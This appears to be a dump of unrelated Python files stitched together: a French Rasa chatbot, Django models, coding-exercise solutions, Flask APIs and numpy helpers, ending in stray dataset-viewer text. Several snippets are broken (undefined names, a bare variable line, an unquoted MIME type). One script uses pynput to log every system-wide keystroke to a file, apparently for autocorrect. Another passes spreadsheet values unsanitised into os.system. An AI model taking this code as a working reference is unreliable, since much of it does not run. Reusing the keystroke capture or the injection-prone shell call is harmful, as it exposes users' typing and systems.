return dispatcher.utter_message('Ah, j\'ai rencontré un problème système, je ne parviens pas à lancer ta recherche, essaie de la reformuler mais si le problème persiste, contacte un référent et transmet-lui le message suivant afin qu\'il me répare s\'il-te-plaît : "Erreur : intent >< \'recherche\' ET slot \'relance\' = False"')
class ActionDefaultFallback(Action):
""" Fonction custom de fallback par défaut matérialisée par l'incompréhension du chatbot :
- annule la dernière incompréhension pour ne pas impacter les prédictions futures,
- force une action de recherche par défaut.
"""
def name(self) -> Text:
return "action_incomprehension"
def run(
self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any],
) -> List["Event"]:
# retourne un message d'incompréhension à l'utilisateur indiquant le lancement d'une recherche par défaut
dispatcher.utter_template("utter_incomprehension", tracker),
# puis retourne le slot booléen "relance" à "True"
# et lance la fonction de recherche
return [
SlotSet("relance", True),
FollowupAction("action_rechercher"),
]
class Conversation(Action):
"""Retourne le utter correspondant à l'intent conversationnel détecté."""
def name(self):
return "action_conversation"
def run(self, dispatcher, tracker, domain):
intent = tracker.latest_message["intent"].get("name")
# récupère l'utter conversationnel correspondant à l'intent détecté
if intent in [
"saluer",
"identite",
"insulter",
"createur",
"meteo",
"possibilites",
"isbot",
"quel_age",
"quelle_langue",
"quelle_heure",
"qui_suis_je",
"quel_nom",
"origine_lieu",
"origine_construction",
"faire_connaissance",
"faire_blague",
"quel_genre",
"merci",
"affirmer",
"infirmer",
"complimenter",
"hors_sujet"
]:
dispatcher.utter_template("utter_" + intent, tracker)
return [] |
from django.db import models
from . import models as base
from . import society
class VehicleBrand(base.BaseModel):
name = models.CharField(max_length=40, null=True, blank=False)
is_active = models.BooleanField(default=0, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
db_table = 'vehicle_brands'
class VehicleModel(base.BaseModel):
name = models.CharField(max_length=40, null=True, blank=False)
brand = models.ForeignKey(VehicleBrand, on_delete=models.SET_NULL, null=True, blank=False)
is_active = models.BooleanField(default=0, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
db_table = 'vehicle_models'
class PartnerVehicle(base.BaseModel):
VEHICLE_FOUR_WHEELER = "Four Wheeler"
VEHICLE_TWO_WHEELER = "Two Wheeler"
VEHICLE_OTHER = "Other"
VEHICLE_CHOICES = (
(VEHICLE_FOUR_WHEELER, "Four Wheeler"),
(VEHICLE_TWO_WHEELER, "Two Wheeler"),
(VEHICLE_OTHER, "Other"),
)
owner = models.ForeignKey(base.ResPartner, on_delete=models.SET_NULL, null=True, blank=True)
vehicle = models.CharField(choices=VEHICLE_CHOICES, max_length=20, null=True, blank=False)
brand = models.ForeignKey(VehicleBrand, on_delete=models.SET_NULL, null=True, blank=True)
registration_number = models.CharField(max_length=40, unique=True, null=True, blank=False)
society = models.ForeignKey(society.ResSociety, on_delete=models.SET_NULL, null=True, blank=False)
def __str__(self):
return self.registration_number
class Meta:
db_table = 'partner_vehicle_rel'
class VehicleParking(base.BaseModel):
name = models.CharField(max_length=40, null=True, blank=False)
parked_vehicle = models.ForeignKey(PartnerVehicle, on_delete=models.SET_NULL, null=True, blank=True)
society = models.ForeignKey(society.ResSociety, on_delete=models.SET_NULL, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
db_table = 'vehicle_parking'
|
#for loop
p = [1,2,3,4,5]
for x in p:
print(x)
q = ['apple','banana','pine apple','orange']
for m in q:
print(m)
k = ['mehedi','012458654','225413','kamrul','noyon','<->',"@"]
print(k[3])
|
from pynput.keyboard import Key, Listener
import logging
from pyautogui import typewrite, hotkey
log_dir = r"C:/users/Cameron/Desktop/1P03/LawtoCorrect/backend/"
logging.basicConfig(filename=(log_dir + "keyLog.txt"), level=logging.DEBUG, format='%(message)s')
keys = []
shifted = False
corrected
def in_alphabet(key):
return 32 < ord(key) < 127
def on_release(key):
global keys, shifted, corrected
try:
if key == Key.space:
write_file(keys)
#corrected = autocorrect()
corrected = ''
if not corrected:
corrected = keys
hotkey('ctrl', 'del')
typewrite(corrected)
keys = []
return
elif key == Key.backspace:
keys.pop()
return
elif key == Key.shift:
shifted = True
return
# print(str(key).replace("'", ""))
if shifted and in_alphabet(str(key).replace("'", "")):
keys.append(str(key).upper())
shifted = False
elif shifted and not in_alphabet(str(key).replace("'", "")):
shifted = False
elif in_alphabet(str(key).replace("'", "")):
keys.append(str(key))
except:
pass
def write_file(keys):
with open("keyLog.txt", "a") as f:
f.write(" ")
for key in keys:
k = str(key).replace("'", "")
f.write(k)
with Listener(on_release=on_release) as listener:
listener.join()
|
#__author: "Jing Xu"
#date: 2018/1/18
# -------------------------------------------------------------------------
# def f(n):
# return n*n*n
#
# a = [ x*2 for x in range(10) ]
#
# s = ( x*2 for x in range(10) ) #generator is an iterable
# print(s) #<generator object <genexpr> at 0x000001C20702C308>
# print(next(s)) #等价于s.__next__() in Py2
# print(next(s))
# -------------------------------------------------------------------------
# s = ( x*2 for x in range(10) )
# for i in s: #for具有调用next的作用
# print(i)
# -------------------------------------------------------------------------
# def foo():
# print('ok')
# yield 1
# print('ok2')
# yield 2
#
# g=foo()
# print(g)
# next(g)
# g=foo()
# next(g)
# print(g)
# next(g)
# -------------------------------------------------------------------------
# def fibo(max):
# n, before, after = 0, 0, 1
# while n < max:
# yield before
# before, after = after, before+after
# n += 1
#
# for i in fibo(10):
# print(i)
# -------------------------------------------------------------------------
# #可迭代对象(对象拥有iter方法的称为可迭代对象)
# l = [1,2,3]
# l.__iter__()
# t = (1,2,3)
# t.__iter__()
# d={'name':'123'}
# d.__iter__()
# -------------------------------------------------------------------------
# def bar():
# print('ok1')
# count = yield 1
# print(count)
# print('ok2')
# count1 = yield 2
# print(count1)
# print('ok3')
# yield 3
#
# b=bar()
# next(b)
# b.send('eee')
# b.send('fff')
# -------------------------------------------------------------------------
# import time
#
# def consumer(name):
# print("%s 准备吃包子" %name)
# while True:
# baozi = yield
# print("包子[%s]来了,被[%s]吃了" %(baozi,name))
#
# def producer(name):
# c = consumer('A')
# c2 = consumer('B')
# c.__next__()
# c2.__next__()
# print("%s准备做包子" %name)
# for i in range(1,19,2):
# time.sleep(1)
# print("做了2个包子")
# c.send(i)
# c2.send(i+1)
#
# producer("alex")
# -------------------------------------------------------------------------
# # 生成器都是迭代器,迭代器不一定是生成器
# # list,tuple,dict,string:Iterable(可迭代对象)
# l = [1,2,3,4,5]
# d = iter(l)
# print(d)
# # 迭代器满足两个条件(迭代器协议):1.有iter方法 2.有next方法
# # for循环内部三件事:1.调用可迭代对象的iter方法,返回一个迭代器对象 2.不断调用迭代器对象的next方法 3.处理StopIteration
# -------------------------------------------------------------------------
# from collections import Iterator,Iterable
#
# l = [1,2,3,4,5]
# d = iter(l)
# print(isinstance(l,list))
# print(isinstance(l,Iterator))
# print(isinstance(l,Iterable))
# print(isinstance(d,Iterator))
# -------------------------------------------------------------------------
print(max(len(x.strip()) for x in open("Help_on_builtin_module_time","r",encoding="utf8"))) |
input_file = 'Day 20\\Input.csv'
text_file = open(input_file)
lines = text_file.read().split('\n')
ips = []
for line in lines:
ip = []
lower = int(line.split('-')[0])
upper = int(line.split('-')[1])
ip.append(lower)
ip.append(upper)
ips.append(ip)
ip_list = sorted(ips)
def min_ip(ips):
ip = 0
i = 0
while ip < 2**32:
lower = ips[i][0]
upper = ips[i][1]
if ip < lower:
return lower - 1
else:
ip = upper + 1
i += 1
def check_ip(i, ips):
for lower, upper in ips:
if lower <= i <= upper:
break
else:
if i < 2**32:
return True
return False
def count_ips(ips):
total = 0
poss = [ip[1] + 1 for ip in ips]
good = [i for i in poss if check_ip(i, ips)]
for ip in good:
while check_ip(ip, ips):
total += 1
ip += 1
return total
print("Part 1: " + str(min_ip(ip_list))) # Correct!
print("Part 2: " + str(count_ips(ip_list))) # Correct! |
from flask import Flask,request
import pandas as pd
import numpy as np
import pickle
from flasgger import Swagger
app=Flask(__name__)
Swagger(app)
pkl_imprt = open('bank_note_base.pkl','rb')
classifier = pickle.load(pkl_imprt)
@app.route('/')
def base():
return "Base path or welcome page"
@app.route('/authenticate')
def authenticate_note():
varaince = request.args.get('variance')
skewness = request.args.get('skewness')
curtosis = request.args.get('curtosis')
entropy = request.args.get('entropy')
# test = pd.read_csv(request.files.get("file"))
return f"""My predicted value is {classifier.predict([[varaince,skewness,curtosis,entropy]])}"""
if __name__ == '__main__':
app.run(host='0.0.0.0',port=8000)
|
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 1 21:42:46 2020
@author: enix3
"""
import torch
import torch.nn as nn
# For DIV2K
class MeanShift(nn.Conv2d):
def __init__(
self, rgb_range,
rgb_mean=(0.4488, 0.4371, 0.4040), rgb_std=(1.0, 1.0, 1.0), sign=-1):
super(MeanShift, self).__init__(3, 3, kernel_size=1)
std = torch.Tensor(rgb_std)
self.weight.data = torch.eye(3).view(3, 3, 1, 1) / std.view(3, 1, 1, 1)
self.bias.data = sign * rgb_range * torch.Tensor(rgb_mean) / std
for p in self.parameters():
p.requires_grad = False
def conv_flops(inputs, outputs, kernel_size):
_, c_in, h_in, w_in = inputs.size()
_, c_out, h_out, w_out = outputs.size()
return kernel_size*kernel_size*c_in*c_out*h_out*w_out |
import json
def getJsonFromFile(filename):
with open('data/{}'.format(filename), 'r') as jsonFile:
return json.load(jsonFile)
def getJsonObjectById(obj, id):
for dict in obj:
if dict['id'] == id:
return dict
|
# -*- coding: utf-8 -*-
"""
@author: Duy Anh Philippe Pham
@date: 26/07/21
@version: 1.00
@Recommandation: Python 3.7
@But : Study of density
"""
import numpy as np
import sys
sys.path.insert(1,'../../libs')
import matplotlib.pylab as plt
import tools, display, barycenter, process
def triangle_sup(mask,n):
# triangle supérieure de taille n (en fonction de l'axe x), masque d'une matrice carrée
for i in range(0,n):#vertical
for j in range(0,n):#horizontal
if i+j<n:
mask[i,j]=1
return mask
def triangle_inf(mask,n):
# triangle inférieur de taille n (en fonction de l'axe x), masque d'une matrice carrée
for i in range(n,np.shape(mask)[0]):#vertical
for j in range(n,np.shape(mask)[1]):#horizontal
if (j+i-np.shape(mask)[0])>n:
mask[i,j]=1
return mask
# Directory
hemi='L'
source='../../data/'+hemi+'/'
source1='../../variables/'
chemin=source1+'DBSCAN/'
# Importation données
barycentre=np.load(source1+"barycentre/"+hemi+'/99.npy')
fenetre=31
Lglissant=np.load(source1+'isomap/'+hemi+'/barycentre glissant/bary_glissant_'+str(fenetre)+'_'+hemi+'.npy')
# Barycentre
X=barycentre
_,_,img_xs=tools.estimate_pseudo_density(X)
img_xs=img_xs/np.sum(img_xs)
image=img_xs#(img_xs>np.percentile(img_xs,90))*img_xs
if False:#Etude loi marginale pour détermination des 4 zones
display.show_map(image, hemi+' - test')
postcentral=np.sum(image,axis=1)
precentral=np.sum(image,axis=0)
plt.figure()
#plt.scatter(list(range(0,len(precentral))),precentral,marker='*',label='Precentral')
plt.scatter(list(range(0,len(postcentral))),postcentral,marker='+',label='Postcentral')
plt.legend()
#plt.title("Marginal laws")
plt.ylim(0,np.max([precentral,postcentral])*1.1)
plt.show()
mask1=triangle_sup(np.zeros(np.shape(image)) ,40)
mask4=triangle_inf(np.zeros(np.shape(image)) ,65)
mask2=triangle_sup(np.zeros(np.shape(image)) ,100)-mask1
mask3=triangle_inf(np.zeros(np.shape(image)) ,0)-mask4
if False: # affiche les masques
display.show_map(mask1,'mask1')
display.show_map(mask2,'mask2')
display.show_map(mask3,'mask3')
display.show_map(mask4,'mask4')
if True:#Etude densité
Larea1=[]
Larea2=[]
Larea3=[]
Larea4=[]
for X in Lglissant:
_,_,img_xs=tools.estimate_pseudo_density(X)
img_xs=img_xs/np.sum(img_xs)
Larea1.append(np.sum(img_xs*mask1))
Larea2.append(np.sum(img_xs*mask2))
Larea3.append(np.sum(img_xs*mask3))
Larea4.append(np.sum(img_xs*mask4))
if True:# Affichage des figures de suivies
plt.figure()
plt.scatter(list(range(0,len(Larea1))),Larea1,label='area 1 - ventral',marker='+')
plt.scatter(list(range(0,len(Larea1))),Larea2,label='area 2 - ventral',marker='+')
plt.scatter(list(range(0,len(Larea1))),Larea3,label='area 3 - dorsal',marker='*')
plt.scatter(list(range(0,len(Larea1))),Larea4,label='area 4 - dorsal',marker='*')
plt.legend()
plt.title(hemi+" - Density tracking")
plt.ylim(0,np.max([Larea1,Larea2,Larea3,Larea4])*1.1)
plt.show() |
N, W = map( int, input().split())
WV = [ list( map( int, input().split())) for _ in range(N)]
dp = [0]*(W+1)
for i in range(N):
w, v = WV[i]
for i in range(W,-1,-1):
if i >= w:
dp[i] = max( dp[i], dp[i-w]+v)
else:
break
print( dp[-1])
|
#Function to check if two strings are rotations of one another
def isRotation(string1, string2):
double = string1 + string1
return bool(double.find(string2) != -1)
print("terwa is rotation of water? ")
print(isRotation("water", "terwa"))
print("terwas is rotation of water? ")
print(isRotation("water", "terwas"))
|
from lib import Math
m = Math()
n1 = 2
n2 = 3
result = m.sumIntegers(n1,n2)
print ("The result of " + str(n1) + " + " + str(n2) + " is: " + str(result)) |
#NOTE: this is in Python 2, not Python 3
import csv
test_list1 = []
class HeartRate:
def __init__(self, filename='filename.csv'):
### Sean:
### csv.reader() is a better solution, but I'll do this quickly
### Feel free to fix / improve.
dataFromFile = open(filename).readlines()
dataKeys = dataFromFile[0].strip().split(',')
dataValues = dataFromFile[1].strip().split(',')
polarPairs = {key:dataValues[i] for i,key in enumerate(dataKeys)}
print "Calories burned = ", polarPairs['Calories']
self.heartrate = []
### Sean:
### Now, get the heartrate list from the file.
def averageHeartRate():
### returns a float to two decimals of the average heart rate during
### the effort
### how does is compare to the Polar calculated value
pass
def maxHeartRate():
### returns a float to two decimals of the maximum heart rate during
### the effort
### how does is compare to the Polar calculated value
pass
def minHeartRate():
### returns a float to two decimals of the minimum heart rate during
### the effort
### how does is compare to the Polar calculated value
pass
def caloriesBurned(gender='female'):
### returns the number of calories burned durring the effort
### here is a simple formula:
### Male: Calories/min = (-55.0969 + (0.6309 * Heart Rate) + (0.1988 * Weight) + (0.2017 * Age)) / 4.184
### Female: Calories/min = (-20.4022 + (0.4472 * Heart Rate) - (0.1263 * Weight) + (0.074 * Age)) / 4.184
### how does is compare to the Polar calculated value
pass
test_list2 = HeartRate(filename='RayHao_Speedwalking.csv')
|
import sys
import os
import xlrd
numlines = int(sys.argv[1])
loc = ("datadictionary.xlsx")
wb = xlrd.open_workbook(loc)
sheet = wb.sheet_by_index(0)
for index in range(2, sheet.nrows):
row = sheet.row_values(index)
if row[0] != '':
os.system("generate.py "+row[0]+" "+str(numlines)+" scripts/"+row[0]+".txt")
|
from django.conf import settings
from portia_api.jsonapi import JSONResponse
def capabilities(request):
capabilities = {
'custom': settings.CUSTOM,
'username': request.user.username,
'capabilities': settings.CAPABILITIES,
}
return JSONResponse(capabilities)
|
class Solution:
def fourSum(self, nums, target):
resList = []
if len(nums)<4:
return resList
nums.sort()
length = len(nums)
# i j k h
for i in range(length-3):
if i>0 and nums[i]==nums[i-1]:
continue
# 找出最大最小值,若不可能满足target值,无需继续判断
minAdd = nums[i]+nums[i+1]+nums[i+2]+nums[i+3]
if minAdd >target:
break
maxAdd = nums[i]+nums[length-1]+nums[length-2]+nums[length-3]
if maxAdd<target:
continue
for j in range(i+1,length-2):
if j>i+1 and nums[j]==nums[j-1]:
continue
minAdd = nums[i]+nums[j]+nums[j+1]+nums[j+2]
if minAdd >target:
continue
maxAdd = nums[i]+nums[j]+nums[length-1]+nums[length-2]
if maxAdd<target:
continue
k = j+1
h = length -1
while k<h:
add = nums[i]+nums[j]+nums[k]+nums[h]
if add==target:
d = []
d.append(nums[i])
d.append(nums[j])
d.append(nums[k])
d.append(nums[h])
resList.append(d)
h-=1
# h已经-1,与之前的那个数比较,如果相同,则继续-1
while k<h and nums[h]==nums[h+1]:
h-=1
k+=1
while k<h and nums[k]==nums[k-1]:
k+=1
continue
if add>target:
h-=1
continue
if add<target:
k+=1
continue
return resList
s = Solution()
f = s.fourSum([-1,0,-5,-2,-2,-4,0,1,-2],-9)
print(f) |
from scrapy.item import Item, Field
import scrapy
class Blog(Item):
text = Field()
time = Field()
image_urls = scrapy.Field()
images = scrapy.Field()
image_paths=Field()
|
#!/usr/bin/python
from flask import Flask
from flask_restplus import Api, Resource, reqparse
from werkzeug.datastructures import FileStorage
from cStringIO import StringIO
from utils.linda import *
from manager.upload import library, model
from manager.run import prepare_instance, execute_workflow
from manager.csar import parse_csar
import os
app = Flask(__name__)
app.config.from_object(__name__)
api = Api(app)
@api.route('/library')
class Library(Resource):
def get(self):
nt_names = linda_rd('node_type_names')
if nt_names is None:
nt_names = []
rt_names = linda_rd('relationship_type_names')
if rt_names is None:
rt_names = []
return {'node_names': nt_names, 'relationship_names': rt_names }
def put_into_s3(self):
parse = reqparse.RequestParser()
parse.add_argument('file', type=FileStorage, location='files', required=True)
args = parse.parse_args()
toscafile = args['file']
imageFile = StringIO()
toscafile.save(imageFile)
keyname = '{0}.{1}'.format('toscatypes','yaml')
content_type = application/x-yaml
bucket_name = 'mon_appli'
file_url = upload_s3(imageFile, key_name, content_type, bucket_name)
#library(filename)
return { 'file_url': file_url }
def put(self):
parse = reqparse.RequestParser()
parse.add_argument('file', type=FileStorage, location='files', required=True)
args = parse.parse_args()
toscafile = args['file']
storedFile = '/tmp/{}.{}'.format(time.time(),toscafile.filename)
toscafile.save(storedFile)
library(storedFile)
return self.get()
@api.route('/model')
class ToscaModel(Resource):
def get(self):
model_names = linda_rd('Model')
if model_names is None:
model_names = []
return { 'model_names': model_names }
def put(self):
parse = reqparse.RequestParser()
parse.add_argument('file', type=FileStorage, location='files', required=True, help="Model have to be valid TOSCA file")
parse.add_argument('name', required=True, help="Model name can not be blank")
args = parse.parse_args()
modelfile = args['file']
modelname = args['name']
storedFile = '/tmp/{}.{}.yaml'.format(time.time(),modelfile.filename)
modelfile.save(storedFile)
model(storedFile, modelname)
return self.get()
@api.route('/instance')
class Instance(Resource):
def get(self):
parse = reqparse.RequestParser()
parse.add_argument('model', required=True, help="Model name can not be blank")
args = parse.parse_args()
model_name = args['model']
instance_names = linda_rd('Instance/{}'.format(model_name))
if instance_names is None:
instance_names = []
return { 'model_name': model_name, 'instance_names': instance_names }
def put(self):
parse = reqparse.RequestParser()
parse.add_argument('model', required=True, help="Model name can not be blank")
parse.add_argument('name', required=True, help="Instance name can not be blank")
args = parse.parse_args()
model_name = args['model']
instance_name = args['name']
prepare_instance(model_name, instance_name)
return self.get()
@api.route('/exec')
class ExecWorkflow(Resource):
def put(self):
parse = reqparse.RequestParser()
parse.add_argument('workflow', required=True, help="Workflow name can not be blank")
parse.add_argument('model', required=True, help="Model name can not be blank")
parse.add_argument('instance', required=True, help="Instance name can not be blank")
args = parse.parse_args()
workflow_name = args['workflow']
model_name = args['model']
instance_name = args['instance']
execute_workflow(workflow_name, model_name, instance_name)
return True
@api.route('/csar')
class CSAR(Resource):
def put(self):
parse = reqparse.RequestParser()
parse.add_argument('file', type=FileStorage, location='files', required=True, help="The file must be a valid CSAR archive")
parse.add_argument('model', required=True, help="Model name can not be blank")
args = parse.parse_args()
csarfile = args['file']
model_name = args['model']
stored_file = '/tmp/{}.{}'.format(time.time(),csarfile.filename)
csarfile.save(stored_file)
parse_csar(stored_file, model_name)
return True
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
|
import numpy as np
def parse_file(filename):
""" Parse files structured in the same way as demos are """
with open(filename) as f:
points = []
for line in f.readlines():
points += [[int(_) for _ in point.strip('()').split(',')] for point in line.split()]
return np.array(points)
def rescale_old(points, new_min=0.1, new_max=1):
""" Rescale each axis to be within the specified range """
if len(points) == 1:
return np.full_like(points, new_max)
pmin = points.min(axis=0)
pmax = points.max(axis=0)
return (points - pmin) / (pmax - pmin) * (new_max - new_min) + new_min
def rescale(points):
"""
Rescale points to [0, 1] range. Assuming positive coordinates
:param points:
:return:
"""
return points / points.max(axis=0)
def center(points):
"""
Move x and y to the center. If points were rescaled, ie new range is [0, 1],
then this will move center from [0.5, 0.5] to [1, 1].
Height is left unchanged
:param points: map points
:return: rescaled points
"""
if len(points) == 1:
return points
pmin = points[:, :-1].min(axis=0)
pmax = points[:, :-1].max(axis=0)
half = (pmax - pmin) / 2
return np.hstack((points[:, :-1] + half, points[:, -1][:, None]))
def gen_borders(xmin=0, xmax=1, ymin=0, ymax=1, n_points=50):
""" Generate border points """
border = []
border += [[_, ymin, 0] for _ in np.linspace(xmin, xmax, n_points)]
border += [[xmin, _, 0] for _ in np.linspace(ymin, ymax, n_points)]
border += [[xmax, _, 0] for _ in np.linspace(ymin, ymax, n_points)]
border += [[_, ymax, 0] for _ in np.linspace(xmin, xmax, n_points)]
return np.array(border)
def gen_grid(xmin=0, xmax=1, ymin=0, ymax=1, n_points=50):
""" Given two vertices, generate grid between them """
x = np.linspace(xmin, xmax, n_points)
y = np.linspace(ymin, ymax, n_points)
return np.meshgrid(x, y)
def normalize(points):
mx = max([max(point) for point in points])
mn = min([min(point) for point in points])
return [[(_ - mn) / (mx - mn) for _ in point] for point in points]
def lin_interpolate(point, xmin=0, xmax=1, ymin=0, ymax=1, zmin=0, zmax=1, steps=50):
interpol = [] # funny name ;)
px, py, pz = point
for x in np.linspace(xmin, xmax, steps):
for y in np.linspace(ymin, ymax, steps):
d = (x - xmin) / (xmax - xmin) * (zmax - zmin) + \
(y - ymin) / (ymax - ymin) * (zmax - zmin)
interpol.append((x, y, d))
return interpol
if __name__ == '__main__':
points = parse_file('../resources/piramid.mod1')
for point in points:
print(point)
h = points[0]
for p in lin_interpolate(points[0], 0, 2, 0, 2, 0, 1, 5):
print(p)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.